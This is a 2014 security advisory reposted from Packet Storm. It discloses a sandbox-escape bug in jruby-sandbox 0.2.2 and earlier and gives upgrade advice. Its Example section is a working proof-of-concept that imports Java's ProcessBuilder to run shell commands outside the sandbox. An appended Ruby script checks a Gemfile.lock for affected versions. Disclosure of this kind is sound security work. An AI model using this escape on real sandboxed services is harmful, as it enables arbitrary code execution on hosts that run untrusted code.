JRuby Sandbox 0.2.2 Bypass

24 Apr 2014. Reported by joernchen. Type: packetstorm. Source: packetstormsecurity.com

`Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>  
  
[ Authors ]  
joernchen <joernchen () phenoelit de>  
  
Phenoelit Group (http://www.phenoelit.de)  
  
[ Affected Products ]  
jruby-sandbox <= 0.2.2  
https://github.com/omghax/jruby-sandbox  
  
[ Vendor communication ]  
2014-04-22 Send vulnerability details to project maintainer  
2014-04-24 Requesting confirmation that details were received  
2014-04-24 Maintainer states he is working on a test case  
2014-04-24 Maintainer releases fixed version  
2014-04-24 Release of this advisory  
  
[ Description ]  
jruby-sandbox aims to allow safe execution of user-given Ruby  
code within a JRuby [0] runtime. However, by importing Java  
classes it is possible to circumvent those protections and  
execute arbitrary code outside the sandboxed environment.  
  
[ Example ]  
  
require 'sandbox'  
sand = Sandbox.safe  
sand.activate!  
  
begin  
sand.eval("print `id`")  
rescue Exception => e  
puts "fail via Ruby ;)"  
end  
puts "Now for some Java"  
  
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")  
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")  
sand.eval("s = Java::java.util.Scanner.new( " +   
"Java::java.lang.ProcessBuilder.new('sh','-c','id')" +   
".start.getInputStream ).useDelimiter(\"\x00\").next")  
sand.eval("print s")  
  
[ Solution ]  
Upgrade to version 0.2.3  
  
[ References ]  
[0] http://jruby.org/  
  
[ end of file ]  
`
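
To act on the Solution above, the following added example (not part of the advisory or of the jruby-sandbox project) reads the text of a `Gemfile.lock` and reports whether the resolved jruby-sandbox version falls in the affected range (<= 0.2.2). The lockfile contents and the `example-dep` gem are constructed sample data, and the helper names are hypothetical.

```ruby
require 'rubygems'

GEM_NAME      = 'jruby-sandbox'
LAST_AFFECTED = Gem::Version.new('0.2.2') # advisory: affected <= 0.2.2, fixed in 0.2.3

# Collect every resolved version of gem_name from the "specs:" blocks of a
# Gemfile.lock. Resolved gems sit at 4 spaces of indent; their dependency
# constraints (6 spaces) and the DEPENDENCIES section are ignored.
def locked_versions(lock_text, gem_name = GEM_NAME)
  in_specs = false
  lock_text.each_line.each_with_object([]) do |line, found|
    case line
    when /\A  specs:\s*\z/ then in_specs = true
    when /\A\S/            then in_specs = false # next top-level section
    when /\A {4}(\S+) \((\d[\w.]*)(?:-[\w.-]+)?\)\s*\z/
      # $2 is the version with any platform suffix (e.g. "-java") dropped,
      # because Gem::Version would read "0.2.2-java" as a prerelease.
      found << Gem::Version.new($2) if in_specs && $1 == gem_name
    end
  end
end

# One result per locked jruby-sandbox entry; empty if the gem is not locked.
def audit(lock_text)
  locked_versions(lock_text).map do |v|
    { version: v.to_s, affected: v <= LAST_AFFECTED }
  end
end

# Constructed sample lockfile, not taken from any real project.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      example-dep (1.0.0)
      jruby-sandbox (0.2.2-java)
        example-dep (~> 1.0)

  PLATFORMS
    java

  DEPENDENCIES
    jruby-sandbox
LOCK

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE_LOCK).each do |r|
    puts "#{GEM_NAME} #{r[:version]}: #{r[:affected] ? 'AFFECTED, upgrade to 0.2.3' : 'ok'}"
  end
end
```

An empty result means the lockfile resolves no jruby-sandbox entry at all, which is different from a clean result and worth reporting separately in CI.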
